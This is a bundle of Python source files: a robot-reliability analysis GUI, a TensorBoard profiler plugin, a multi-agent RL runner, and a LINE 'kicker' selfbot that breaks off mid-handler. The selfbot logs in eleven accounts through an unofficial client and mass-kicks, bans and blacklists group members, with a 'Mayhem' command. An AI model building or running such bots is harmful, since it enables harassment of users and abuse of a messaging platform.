robot_reliability_value_list = list()
robot_distance_list = list()
robot_time_list = list()
for j in range(self.robot_count):
robot_cnt = int(j + 1)
mesafe_list = list()
zaman_list = list()
temp_mesafe_list = list(self.robot_main_dict["Mesafe"][str("robot_" + str(robot_cnt))][str(route_cnt)])
mesafe_list, zaman_list = self.get_mesafe_and_zaman_list_func(temp_mesafe_list, robot_cnt)
potc_value, reliability_value, time_value, distance_value = self.calculate_potc_and_reliability_func(process_count, mesafe_list, zaman_list, route_cnt, robot_cnt)
robot_potc_value *= float(potc_value)
robot_reliability_value_list.append(reliability_value)
robot_time_list.append(time_value)
robot_distance_list.append(distance_value)
return robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list
def calculate_main_potc_func(self):
loop_control = False
process_count = 0
while not loop_control:
process_count += 1
self.system_main_dict[str(process_count)] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list()}
potc_list = list([0])
robot_reliability_list = list([0])
system_reliability_list = list([0])
time_list = list([0])
distance_list = list([0])
for i in range(self.route_count):
route_cnt = int(i + 1)
robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list = self.calculate_robot_potc_and_reliability_func(process_count, route_cnt)
potc_list.append(float(robot_potc_value))
robot_reliability_list.append(robot_reliability_value_list)
system_reliability_value = self.calculate_system_reliability_func(robot_reliability_value_list)
system_reliability_list.append(float(system_reliability_value))
time_list.append(robot_time_list)
distance_list.append(robot_distance_list)
if self.threshold_type:
best_value_index = potc_list.index(max(potc_list))
print("POTC Value = {0:2.15f} -> System Reliability = {1:2.15f}".format(potc_list[best_value_index], system_reliability_list[best_value_index]))
if potc_list[best_value_index] < self.threshold_value:
loop_control = True
else:
best_value_index = system_reliability_list.index(max(system_reliability_list))
print("System Reliability = {0:2.15f} -> POTC Value = {1:2.15f}".format(system_reliability_list[best_value_index], potc_list[best_value_index]))
if system_reliability_list[best_value_index] < self.threshold_value:
loop_control = True
self.system_main_dict[str(process_count)]["POTC"] = potc_list[best_value_index]
self.system_main_dict[str(process_count)]["Reliability"] = system_reliability_list[best_value_index]
self.system_main_dict[str(process_count)]["Secili Rota"] = best_value_index
self.system_main_dict[str(process_count)]["Robot Reliability"] = robot_reliability_list[best_value_index]
self.system_main_dict[str(process_count)]["Robot Time"] = time_list[best_value_index]
self.system_main_dict[str(process_count)]["Robot Distance"] = distance_list[best_value_index]
print("Process Count -> " + str(process_count) + " Selected Route -> " + str(best_value_index))
print("\n")
self.set_write_data_list_func()
if __name__ == '__main__':
#try:
#rospy.init_node('start_potc_analysis')
app = QtWidgets.QApplication(sys.argv)
MAIN_WINDOW = QtWidgets.QMainWindow()
POTC_Gui = POTC_Analysis()
POTC_Gui.setupUi(MAIN_WINDOW)
MAIN_WINDOW.show()
sys.exit(app.exec_())
"""
except Exception as err:
print(err)
"""
|
plugin.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import multiprocessing
import os
import threading
import time
from collections import OrderedDict
import werkzeug
from tensorboard.plugins import base_plugin
from werkzeug import wrappers
from . import consts
from . import utils
from .profiler import RunLoader
from .run import Run
logger = utils.get_logger()
class TorchProfilerPlugin(base_plugin.TBPlugin):
"""TensorBoard plugin for Torch Profiler."""
plugin_name = consts.PLUGIN_NAME
def __init__(self, context):
"""Instantiates TorchProfilerPlugin.
Args:
context: A base_plugin.TBContext instance.
"""
super(TorchProfilerPlugin, self).__init__(context)
self.logdir = os.path.abspath(context.logdir)
self._is_active = None
self._is_active_initialized_event = threading.Event()
self._runs = OrderedDict()
self._runs_lock = threading.Lock()
self._queue = multiprocessing.Queue()
monitor_runs = threading.Thread(target=self.monitor_runs, name="monitor_runs", daemon=True)
monitor_runs.start()
receive_runs = threading.Thread(target=self.receive_runs, name="receive_runs", daemon=True)
receive_runs.start()
def is_active(self):
"""Returns whether there is relevant data for the plugin to process.
"""
self._is_active_initialized_event.wait()
return self._is_active
def get_plugin_apps(self):
return {
"/index.js": self.static_file_route,
"/main.js": self.static_file_route,
"/index.html": self.static_file_route,
"/overall.html": self.static_file_route,
"/trace_viewer_full.html": self.static_file_route,
"/trace_embedding.html": self.static_file_route,
"/operator.html": self.static_file_route,
"/kernel.html": self.static_file_route,
"/runs": self.runs_route,
"/views": self.views_route,
"/workers": self.workers_route,
"/overview": self.overview_route,
"/operation": self.operation_pie_route,
"/operation/table": self.operation_table_route,
"/kernel": self.kernel_pie_route,
"/kernel/table": self.kernel_table_route,
"/trace": self.trace_route
}
def frontend_metadata(self):
return base_plugin.FrontendMetadata(es_module_path="/index.js")
def monitor_runs(self):
logger.info("Monitor runs begin")
# Set _is_active quickly based on file pattern match, don't wait for data loading
self._is_active = any(self._get_run_dirs())
self._is_active_initialized_event.set()
touched = set()
while True:
try:
logger.debug("Scan run dir")
run_dirs = self._get_run_dirs()
                # Assume run directories are never deleted; trigger an async load when a new run is found
for name, run_dir in run_dirs:
if name not in touched:
logger.info("Find run %s under %s", name, run_dir)
touched.add(name)
# Use multiprocessing to avoid UI stall and reduce data parsing time
process = multiprocessing.Process(target=_load_run, args=(self._queue, name, run_dir))
process.daemon = True
process.start()
except Exception as ex:
logger.warning("Failed to scan runs. Exception=%s", ex, exc_info=True)
time.sleep(consts.MONITOR_RUN_REFRESH_INTERNAL_IN_SECONDS)
def receive_runs(self):
while True:
run = self._queue.get()
if run is None:
continue
logger.info("Add run %s", run.name)
with self._runs_lock:
is_new = run.name not in self._runs
self._runs[run.name] = run
if is_new:
self._runs = OrderedDict(sorted(self._runs.items()))
# Update is_active
if not self._is_active:
self._is_active = True
def _get_run_dirs(self):
"""Scan logdir, find PyTorch Profiler run directories.
        A directory is considered a run if it contains one or more *.pt.trace.json[.gz] files.
E.g. there are 2 runs: run1, run2
/run1
/[worker1].pt.trace.json.gz
/[worker2].pt.trace.json.gz
/run2
/[worker1].pt.trace.json
"""
for root, _, files in os.walk(self.logdir):
for file in files:
if utils.is_chrome_trace_file(file):
run_dir = os.path.abspath(root)
if run_dir == self.logdir:
name = os.path.basename(run_dir)
else:
name = os.path.relpath(run_dir, self.logdir)
yield name, run_dir
break
def get_run(self, name) -> Run:
with self._runs_lock:
return self._runs.get(name, None)
@wrappers.Request.application
def runs_route(self, request):
with self._runs_lock:
names = list(self._runs.keys())
return self.respond_as_json(names)
@wrappers.Request.application
def views_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
views = sorted(run.views, key=lambda x: x.id)
views_list = []
for view in views:
views_list.append(view.display_name)
return self.respond_as_json(views_list)
@wrappers.Request.application
def workers_route(self, request):
name = request.args.get("run")
run = self.get_run(name)
return self.respond_as_json(run.workers)
@wrappers.Request.application
def overview_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
data = profile.overview
is_gpu_used = profile.has_runtime or profile.has_kernel or profile.has_memcpy_or_memset
data["environments"] = [{"title": "Number of Worker(s)", "value": str(len(run.workers))},
{"title": "Device Type", "value": "GPU" if is_gpu_used else "CPU"}]
return self.respond_as_json(data)
@wrappers.Request.application
def operation_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_pie_by_name_input)
else:
return self.respond_as_json(profile.operation_pie_by_name)
@wrappers.Request.application
def operation_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "OperationAndInputShape":
return self.respond_as_json(profile.operation_table_by_name_input)
else:
return self.respond_as_json(profile.operation_table_by_name)
@wrappers.Request.application
def kernel_pie_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
return self.respond_as_json(profile.kernel_pie)
@wrappers.Request.application
def kernel_table_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
group_by = request.args.get("group_by")
run = self.get_run(name)
profile = run.get_profile(worker)
if group_by == "Kernel":
return self.respond_as_json(profile.kernel_table)
else:
return self.respond_as_json(profile.kernel_op_table)
@wrappers.Request.application
def trace_route(self, request):
name = request.args.get("run")
worker = request.args.get("worker")
run = self.get_run(name)
profile = run.get_profile(worker)
        with open(profile.trace_file_path, 'rb') as f:
raw_data = f.read()
if profile.trace_file_path.endswith('.gz'):
headers = []
headers.append(('Content-Encoding', 'gzip'))
return werkzeug.Response(raw_data, content_type="application/json", headers=headers)
else:
return werkzeug.Response(raw_data, content_type="application/json")
@wrappers.Request.application
def static_file_route(self, request):
filename = os.path.basename(request.path)
extension = os.path.splitext(filename)[1]
if extension == '.html':
mimetype = 'text/html'
elif extension == '.css':
mimetype = 'text/css'
elif extension == '.js':
mimetype = 'application/javascript'
else:
mimetype = 'application/octet-stream'
filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
try:
with open(filepath, 'rb') as infile:
contents = infile.read()
except IOError:
            return werkzeug.Response('404 Not Found', status=404, content_type='text/plain')
return werkzeug.Response(
contents, content_type=mimetype
)
@staticmethod
def respond_as_json(obj):
content = json.dumps(obj)
return werkzeug.Response(content, content_type="application/json")
def _load_run(queue, name, run_dir):
import absl.logging
absl.logging.use_absl_handler()
try:
logger.info("Load run %s", name)
# Currently, assume run data is immutable, so just load once
loader = RunLoader(name, run_dir)
run = loader.load()
logger.info("Run %s loaded", name)
queue.put(run)
except Exception as ex:
logger.warning("Failed to load run %s. Exception=%s", ex, name, exc_info=True)
|
Runner.py
|
import threading
import numpy as np
import ray
from Ray_ACNet import ACNet
import GroupLock
from Primal2Env import Primal2Env
from Primal2Observer import Primal2Observer
from Map_Generator2 import maze_generator
from Worker import Worker
from parameters import *
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
class Runner(object):
"""Actor object to start running simulation on workers.
Gradient computation is also executed on this object."""
def __init__(self, metaAgentID):
# tensorflow must be imported within the constructor
# because this class will be instantiated on a remote ray node
import tensorflow as tf
num_agents = NUM_THREADS
self.env = Primal2Env(num_agents=num_agents,
observer=Primal2Observer(observation_size=OBS_SIZE,
num_future_steps=NUM_FUTURE_STEPS),
map_generator=maze_generator(
env_size=ENVIRONMENT_SIZE,
wall_components=WALL_COMPONENTS,
obstacle_density=OBSTACLE_DENSITY),
IsDiagonal=DIAG_MVMT,
isOneShot=True)
self.metaAgentID = metaAgentID
trainer = None
self.localNetwork = ACNet(LOCAL_NET_SCOPE,a_size,trainer,True,NUM_CHANNEL,OBS_SIZE,GLOBAL_NET_SCOPE=GLOBAL_NET_SCOPE, GLOBAL_NETWORK=False)
self.currEpisode = int(metaAgentID)
self.global_step = tf.placeholder(tf.float32)
        # the first `NUM_IL_META_AGENTS` agents only run imitation learning and don't need a GPU
if self.metaAgentID < NUM_IL_META_AGENTS:
config = tf.ConfigProto(allow_soft_placement=True, device_count={"GPU": 0})
self.coord = None
self.saver = None
else:
# set up tf session
config = tf.ConfigProto(allow_soft_placement = True)
config.gpu_options.per_process_gpu_memory_fraction = 4.0 / (NUM_META_AGENTS - NUM_IL_META_AGENTS + 1)
config.gpu_options.allow_growth=True
self.saver = tf.train.Saver(max_to_keep=1)
self.coord = tf.train.Coordinator()
self.sess = tf.Session(config=config)
self.sess.run(tf.global_variables_initializer())
self.weightVars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
weights = self.sess.run(self.weightVars)
self.weightSetters = [tf.placeholder(shape=w.shape, dtype=tf.float32) for w in weights]
self.set_weights_ops = [var.assign(w) for var, w in zip(self.weightVars, self.weightSetters)]
def __del__(self):
print('((Runner)__del__)meta:{}'.format(self.metaAgentID))
def set_weights(self, weights):
feed_dict = {
self.weightSetters[i]: w for i, w in enumerate(weights)
}
self.sess.run([self.set_weights_ops], feed_dict=feed_dict)
def multiThreadedJob(self, episodeNumber):
workers = []
worker_threads = []
workerNames = ["worker_" + str(i+1) for i in range(NUM_THREADS)]
groupLock = GroupLock.GroupLock([workerNames, workerNames]) # TODO
workersPerMetaAgent = NUM_THREADS
for a in range(NUM_THREADS):
agentID = a + 1
workers.append(Worker(self.metaAgentID, agentID, workersPerMetaAgent,
self.env, self.localNetwork,
self.sess, groupLock, learningAgent=True, global_step=self.global_step))
        for w in workers:
            groupLock.acquire(0, w.name)
            # bind w as a default argument so each thread runs its own worker
            # (a plain closure would late-bind to the loop variable)
            worker_work = lambda w=w: w.work(episodeNumber, self.coord, self.saver, self.weightVars)
            t = threading.Thread(target=worker_work)
            t.start()
            worker_threads.append(t)
self.coord.join(worker_threads)
jobResults = []
loss_metrics = []
perf_metrics = []
is_imitation = None
for w in workers:
if w.learningAgent:
if JOB_TYPE == JOB_OPTIONS.getGradient:
jobResults = jobResults + w.allGradients
elif JOB_TYPE == JOB_OPTIONS.getExperience:
jobResults.append(w.experienceBuffer)
is_imitation = False # w.is_imitation
loss_metrics.append(w.loss_metrics)
perf_metrics.append(w.perf_metrics)
avg_loss_metrics = list(np.mean(np.array(loss_metrics), axis=0))
if not is_imitation:
# perf_metrics structure:
#
# w.perf_metrics = [
# episode_step_count,
# episode_values,
# episode_inv_count,
# episode_stop_count,
# episode_reward,
# targets_done
# ]
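            # columns 0-3 (steps, values, invalid moves, stops) are averaged
            # across workers; reward (col 4) and targets done (col 5) are summed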
perf_metrics = np.array(perf_metrics)
avg_perf_metrics = np.mean(perf_metrics[:, :4], axis=0)
episode_reward = np.sum(perf_metrics[:,4])
targets_done = np.sum(perf_metrics[:, 5])
avg_perf_metrics = list(avg_perf_metrics) + [episode_reward, targets_done]
all_metrics = avg_loss_metrics + avg_perf_metrics
else:
all_metrics = avg_loss_metrics
return jobResults, all_metrics, is_imitation
def imitationLearningJob(self, episodeNumber):
workersPerMetaAgent = NUM_THREADS
agentID=None
groupLock = None
worker = Worker(self.metaAgentID, agentID, workersPerMetaAgent,
self.env, self.localNetwork,
self.sess, None, learningAgent=True, global_step=self.global_step)
gradients, losses = worker.imitation_learning_only(episodeNumber)
mean_imitation_loss = [np.mean(losses)]
is_imitation = True
return gradients, mean_imitation_loss, is_imitation
def job(self, global_weights, episodeNumber):
print("(Runner)metaAgent {0} starting episode {1}".format(self.metaAgentID, episodeNumber))
# set the local weights to the global weight values from the master network
self.set_weights(global_weights)
# set first `NUM_IL_META_AGENTS` to perform imitation learning
if self.metaAgentID < NUM_IL_META_AGENTS:
jobResults, metrics, is_imitation = self.imitationLearningJob(episodeNumber)
elif COMPUTE_TYPE == COMPUTE_OPTIONS.multiThreaded:
jobResults, metrics, is_imitation = self.multiThreadedJob(episodeNumber)
elif COMPUTE_TYPE == COMPUTE_OPTIONS.synchronous:
print("not implemented")
assert(1==0)
# Get the job results from the learning agents
# and send them back to the master network
info = {
"id": self.metaAgentID,
"episode_number": episodeNumber,
"is_imitation": is_imitation
}
return jobResults, metrics, info
@ray.remote(num_cpus=2, num_gpus=4.0 / (NUM_META_AGENTS - NUM_IL_META_AGENTS + 1))
class RLRunner(Runner):
def __init__(self, metaAgentID):
super().__init__(metaAgentID)
@ray.remote(num_cpus=1, num_gpus=0)
class imitationRunner(Runner):
def __init__(self, metaAgentID):
super().__init__(metaAgentID)
if __name__ == '__main__':
pass
|
self.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re
cl = LINETCR.LINE()
cl.login(qr=True)
cl.loginResult()
ki = LINETCR.LINE()
ki.login(qr=True)
ki.loginResult()
ki2 = LINETCR.LINE()
ki2.login(qr=True)
ki2.loginResult()
ki3 = LINETCR.LINE()
ki3.login(qr=True)
ki3.loginResult()
ki4 = LINETCR.LINE()
ki4.login(qr=True)
ki4.loginResult()
ki5 = LINETCR.LINE()
ki5.login(qr=True)
ki5.loginResult()
ki6 = LINETCR.LINE()
ki6.login(qr=True)
ki6.loginResult()
ki7 = LINETCR.LINE()
ki7.login(qr=True)
ki7.loginResult()
ki8 = LINETCR.LINE()
ki8.login(qr=True)
ki8.loginResult()
ki9 = LINETCR.LINE()
ki9.login(qr=True)
ki9.loginResult()
ki10 = LINETCR.LINE()
ki10.login(qr=True)
ki10.loginResult()
print "Iphenk login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" **IP chatBot Help Menu**
↠Public Command↞
√ [Bot]- -Show Contact All Bot
√ [Group id]- -Show Group ID
√ [Ginfo]- -Show Group Info
√ [Mid all]- -Show all the Bot(s) MID
√ [Respon]- -Check Response Bot
√ [Speed]- -Check Bot Speed
√ [Banlist]- -Check Banned Contact
√ [Gn G.Name]- -Change Group Name
√ [Cancel]- -Cancel Group Invitation
√ [Tag All]- -Tag All Member
√ [View]- -View Setting
√ [Open]- -Open Url
√ [Close]- -Close Url
√ [Stafflist]
√ [Set]
↠KICKER↞
**Protect / Damage Your Group**
√ [Banned @] Ban Target
√ [Unban @] Unban Target
√ [Kill @] Kick Banned Target
√ [Nk @] Kick Target User
√ [All] Invite All Bots
√ [Mayhem] Do not use in the group
「 Edited By 」
http://line.me/ti/p/zuFNPuXyEb
"""
Setgroup =""" **Bot Protection Key**
√ [AllProtection]~[AllProtection on / off]
√ [Protect QR]~[Qr on / off]
√ [Mid Check]~[Contact On / Off]
√ [Reject Invite]~[Guest On / Off]
√ [Protect Cancel]~[Proc on / off]
√ [Member Protect]~[MProtection on / off]
"""
KAC=[cl,ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = ki2.getProfile().mid
Cmid = ki3.getProfile().mid
Dmid = ki4.getProfile().mid
Emid = ki5.getProfile().mid
Fmid = ki6.getProfile().mid
Gmid = ki7.getProfile().mid
Hmid = ki8.getProfile().mid
Imid = ki9.getProfile().mid
Jmid = ki10.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,"u9e5a757e7b6e466baf87e8f747d96eb5","ud4f80e5acbc5b7d325284692a9900941"]
admin = ["u9e5a757e7b6e466baf87e8f747d96eb5","ud4f80e5acbc5b7d325284692a9900941"]
staff = ["u9e5a757e7b6e466baf87e8f747d96eb5"]
adminMID = "u9e5a757e7b6e466baf87e8f747d96eb5","ud4f80e5acbc5b7d325284692a9900941"
wait = {
'contact':True,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"Thanks for add me",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"IP ディータ",
"cName2":"ディータ1つ " ,
"cName3":"ディータ二人 ",
"cName4":"ディータ三 ",
"cName5":"ディータ4人 ",
"cName6":"ディータ五 ",
"cName7":"ディータ6 ",
"cName8":"ディータ7人 ",
"cName9":"ディータ8人 ",
"cName10":"ディータ9人 ",
"cName11":"ディータ10人 ",
"blacklist":{},
"wblacklist":False,
"dblacklist":True,
"ProtectQR":False,
"Protectguest":False,
"Protectcancel":False,
"protectionOn":True,
"atjointicket":True,
"MProtection":False,
"AllProtection":False
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = {}
setTime = wait2['setTime']
messageReq = {}
def sendMessage(to, text, contentMetadata={}, contentType=0):
    # Build a Message from this account's mid and track a per-target request
    # counter; the actual sending is handled elsewhere by the client objects.
    mes = Message()
    mes.to, mes.from_ = to, mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------Protect Qr-------#
if op.type == 11:
if wait["ProtectQR"] == True:
                if op.param2 not in Bots and op.param2 not in staff:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
ki.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------Finish------#
# -INV KICK- #
if op.type == 13:
if wait["Protectguest"] == True:
                if op.param2 in Bots or op.param2 in staff:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
#--CANCEL KICK--#
if op.type == 32:
if wait["Protectcancel"] == True:
                if op.param2 not in Bots and op.param2 not in staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
if op.type == 15:
random.choice(KAC).sendText(op.param1, cl.getContact(op.param2).displayName + " Good Bye\n(*´・ω・*)")
print op.param3 + "has left the group"
if op.type == 13:
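            # Invitation daisy-chain: when a bot is invited by the previous bot
            # in the ring, that bot temporarily opens the group ticket, the
            # invitee joins by ticket, and the ticket is closed and reissued.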
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
                    Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in Fmid:
X = ki6.getGroup(op.param1)
X.preventJoinByTicket = False
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.param3 in Fmid:
if op.param2 in Gmid:
X = ki7.getGroup(op.param1)
X.preventJoinByTicket = False
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki6.updateGroup(X)
Ti = ki6.reissueGroupTicket(op.param1)
if op.param3 in Gmid:
if op.param2 in Hmid:
X = ki8.getGroup(op.param1)
X.preventJoinByTicket = False
ki8.updateGroup(X)
Ti = ki8.reissueGroupTicket(op.param1)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki7.updateGroup(X)
Ti = ki7.reissueGroupTicket(op.param1)
if op.param3 in Hmid:
if op.param2 in Imid:
X = ki9.getGroup(op.param1)
X.preventJoinByTicket = False
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki8.updateGroup(X)
                    Ti = ki8.reissueGroupTicket(op.param1)
if op.param3 in Imid:
if op.param2 in Jmid:
X = ki10.getGroup(op.param1)
X.preventJoinByTicket = False
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki9.updateGroup(X)
Ti = ki9.reissueGroupTicket(op.param1)
if op.param3 in Jmid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki10.updateGroup(X)
Ti = ki10.reissueGroupTicket(op.param1)
if op.type == 13:
print op.param1
print op.param2
print op.param3
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
                    # op.param3 may hold several invitee mids; assume LINE's
                    # '\x1e' record separator between mids
                    InviterX = op.param3.split("\x1e")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
                ki.inviteIntoGroup(op.param1,[op.param3])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
ki6.acceptGroupInvitationByTicket(op.param1,Ti)
ki7.acceptGroupInvitationByTicket(op.param1,Ti)
ki8.acceptGroupInvitationByTicket(op.param1,Ti)
ki9.acceptGroupInvitationByTicket(op.param1,Ti)
ki10.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
